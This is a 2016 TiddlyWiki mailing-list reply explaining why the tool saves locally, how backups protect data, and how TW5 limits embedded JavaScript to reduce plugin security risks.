On Monday, May 2, 2016 at 7:55:00 PM UTC-7, Stephen Kimmel wrote: > > I work for an engineering company and TiddlyWiki is something I use almost > constantly. My company, however, would rather that I use another wiki > program that is part of an integrated package. Without going into too much > detail, the words that immediately come to mind when describing that > program are "useless" and "vile." Although they've never prohibited me from > using TiddlyWiki, they have raised questions that I can't easily answer > such as "How secure is our corporate data?" and "How do you know it isn't > transmitting data outside the company?" and finally "How do you know it > won't damage the data on our network?" >
For many, many years, I have described TiddlyWiki thus: "USE it like a website, OWN it like a document". Thus, "How secure is our corporate data?"... is a function of how your company handles internal document files, such as Word, Excel, etc. If you follow the same security protocols for handling TiddlyWiki documents as you do for other types, then there is no difference in security. Regarding "how do you know it isn't transmitting data outside the company"... When using stand-alone .html files, TiddlyWiki always attempts to save the file *locally*. For TiddlyWiki to save to a remote location, it need to be either running the NodeJS-based TiddlyWiki, or use a server-side script (e.g., store.php). Both of these methods require explicit installation/configuration to be enabled. Thus, it is unlikely that any data could be transmitted outside the company without you knowing. As long as you have security procedures in place to prevent sending unauthorized files to outside entities, then TiddlyWiki poses no more risk than any other file types in use within your company. As noted above, TiddlyWiki writes *local files* by default. The only data that could damaged by TiddlyWiki would be the TiddlyWiki files themselves. Fortunately, because each TiddlyWiki file is stand-alone and self-contained, it's very easy to make backups simply by copying the TiddlyWiki file before beginning an editing session. That way, if something does happen, you can always get back to the most recent previously saved data by restoring the file from the backup copy. My first reaction is to discount this as paranoia but I don't know the > inner workings of TiddlyWiki well enough to know it isn't doing those > things and I'm not sure anyone but Jeremy (and perhaps Eric) do know. I'm > more worried about Google making copies of my data than I am Jeremy doing > it. Still Firefox and most modern browsers have gone out of their way to > prevent applications like TiddlyWiki from working. On a separate but > related note, one of the math routines developed for TiddlyWiki used a > separate math package to avoid using the "dangerous" javascript eval > function. Could some malicious bastard create a plugin that could actually > damage our computers or our data outside the Wiki? > In TiddlyWiki Classic, my TiddlyTools InlineJavascriptPlugin allows arbitrary javascript to be invoked from any tiddler. This *does* present a bit of a security gap, in that someone could send you a tiddler that could *try* to mess with your "data outside the wiki". However, nearly all script exploits rely on functions that modern browser "prevent from working", so TW Classic is relatively safe. TW5 is even safer. It does not permit use of javascript embedded in tiddlers (i.e. <script>...</script> blocks are ignored), and even prevents use of inline event handlers (onClick, onChange, onSelect, etc.) in HTML code. To invoke javascript code in TW5, it must be contained in a tiddler with a suitable module type (macro, widget, etc.) which the TW5 core invokes during startup. This ensures that there is a mechanism by which the TW core can control what scripts are invoked. This makes it very unlikely that someone could sneak some malicious code into your TW. enjoy, -e -- You received this message because you are subscribed to the Google Groups "TiddlyWiki" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To post to this group, send email to [email protected]. Visit this group at https://groups.google.com/group/tiddlywiki. To view this discussion on the web visit https://groups.google.com/d/msgid/tiddlywiki/f7467fc2-21c6-4028-9d0e-86ecd93371d9%40googlegroups.com. For more options, visit https://groups.google.com/d/optout.
